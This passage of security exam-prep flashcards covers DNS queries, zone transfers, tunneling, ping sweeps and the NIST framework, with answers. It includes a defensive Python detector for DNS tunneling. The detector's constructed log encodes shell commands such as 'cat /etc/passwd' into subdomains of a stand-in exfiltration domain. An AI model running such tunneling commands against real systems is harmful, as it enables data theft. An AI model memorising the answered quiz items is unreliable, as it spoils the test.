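    """Decode repeatedly until the string stops changing; return it with the round count.
    A count above 1 means the input was double-encoded, which is itself worth flagging."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(s)
        if decoded == s:
            break
        s, rounds = decoded, rounds + 1
    return s, rounds


def classify(s: str) -> str:
    """Heuristic: which of the card's four transformations does the string look like?
    Encryption output has no fixed shape, so it falls into the last bucket."""
    if PCT.search(s):
        return "url-encoding"
    if HEX_DIGEST.fullmatch(s):
        return "hex digest (hash output; not reversible)"
    if B64.fullmatch(s) and len(s) % 4 == 0:
        try:
            base64.b64decode(s, validate=True)
            return "base64"
        except binascii.Error:
            pass
    return "plain or unknown"
```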

96

What would you get from running the command dig ns domain.com?

A. Mail exchanger records for domain.com

B. Name server records for domain.com

C. Caching name server for domain.com

D. IP address for the hostname ns

B. Name server records for domain.com

97

What technique would you ideally use to get all of the hostnames associated with a domain?

A. DNS query

B. Zone copy

C. Zone transfer

D. Recursive request

C. Zone transfer

98

If you were to notice operating system commands inside a DNS request while looking at a packet capture, what might you be looking at?

A. Tunneling attack

B. DNS amplification

C. DNS recursion

D. XML entity injection

A. Tunneling attack
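
Worked example for this card (added here; not part of the original card set): a detector run over a constructed DNS query log in which one client's queries carry base32-encoded shell commands in the subdomain, the way a DNS tunnel does, plus the decoder that turns such a label back into the command the card mentions. The client addresses, domain names, thresholds and the use of the last two labels as "the domain" are all assumptions for the illustration; a production version would use a public-suffix list and tune the thresholds on the organization's own traffic.

```python
import base64
import binascii
import math
from collections import defaultdict
from typing import Dict, Iterable, Optional, Tuple

LONG_LABEL = 20      # subdomain data length above which entropy is examined
ENTROPY_BITS = 3.0   # bits/char; names like "www" or "mail" sit well below this
MIN_DISTINCT = 5     # distinct subdomains per (client, domain) that looks like a data stream


def b32_label(data: bytes) -> str:
    """Encode like a tunnel client: base32 survives case-folding resolvers; padding dropped."""
    return base64.b32encode(data).decode().rstrip("=").lower()


def b32_decode_subdomain(sub: str) -> Optional[bytes]:
    """Reverse b32_label across dotted chunks; None if the name is not base32 at all."""
    s = sub.replace(".", "").upper()
    s += "=" * (-len(s) % 8)
    try:
        return base64.b32decode(s)
    except (binascii.Error, ValueError):
        return None


def shannon_entropy(s: str) -> float:
    """Bits per character; 0.0 for a single repeated symbol, up to log2(#symbols)."""
    if not s:
        return 0.0
    counts = {ch: s.count(ch) for ch in set(s)}
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def split_name(qname: str) -> Tuple[str, str]:
    """(subdomain, domain), taking the last two labels as the domain (assumption)."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def name_is_suspicious(qname: str) -> bool:
    sub, _ = split_name(qname)
    data = sub.replace(".", "")
    return len(data) >= LONG_LABEL and shannon_entropy(data) >= ENTROPY_BITS


def find_tunnel_suspects(log: Iterable[Tuple[str, str]]) -> Dict[Tuple[str, str], str]:
    """log: (client_ip, qname) pairs. Returns {(client, domain): reason} for flagged pairs."""
    seen = defaultdict(set)
    hot = defaultdict(int)
    for client, qname in log:
        sub, domain = split_name(qname)
        seen[(client, domain)].add(sub)
        if name_is_suspicious(qname):
            hot[(client, domain)] += 1
    suspects = {}
    for key, subs in seen.items():
        reasons = []
        if len(subs) >= MIN_DISTINCT:
            reasons.append(f"{len(subs)} distinct subdomains")
        if hot[key]:
            reasons.append(f"{hot[key]} long high-entropy names")
        if reasons:
            suspects[key] = "; ".join(reasons)
    return suspects


# Constructed query log (client, qname); the tunnel names carry base32-encoded shell commands.
COMMANDS = [b"cat /etc/passwd", b"id", b"uname -a", b"ls -la /root", b"whoami", b"ip addr"]
QUERY_LOG = [
    ("10.0.0.5", "www.example.com"),
    ("10.0.0.5", "mail.example.com"),
    ("10.0.0.5", "cdn-assets-01.example.com"),
    ("10.0.0.5", "www.example.com"),
    ("10.0.0.7", "www.example.com"),
] + [("10.0.0.7", f"{b32_label(cmd)}.exfil.example") for cmd in COMMANDS]
```

Two signals are combined on purpose: a single long, random-looking label catches bulk exfiltration, while the count of distinct subdomains under one domain from one client catches interactive tunnels whose individual messages (such as `id`) are too short to look odd on their own.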

99

What would be the purpose of running a ping sweep?

A. You want to identify responsive hosts without a port scan.

B. You want to use something that is light on network traffic.

C. You want to use a protocol that may be allowed through the firewall.

D. All of the above.

D. All of the above.

100

How many functions are specified by NIST’s cybersecurity framework?

A. 0

B. 3

C. 5

D. 4

C. 5 (Identify, Protect, Detect, Respond, Recover in CSF 1.1; CSF 2.0, published in 2024, adds Govern for a total of six)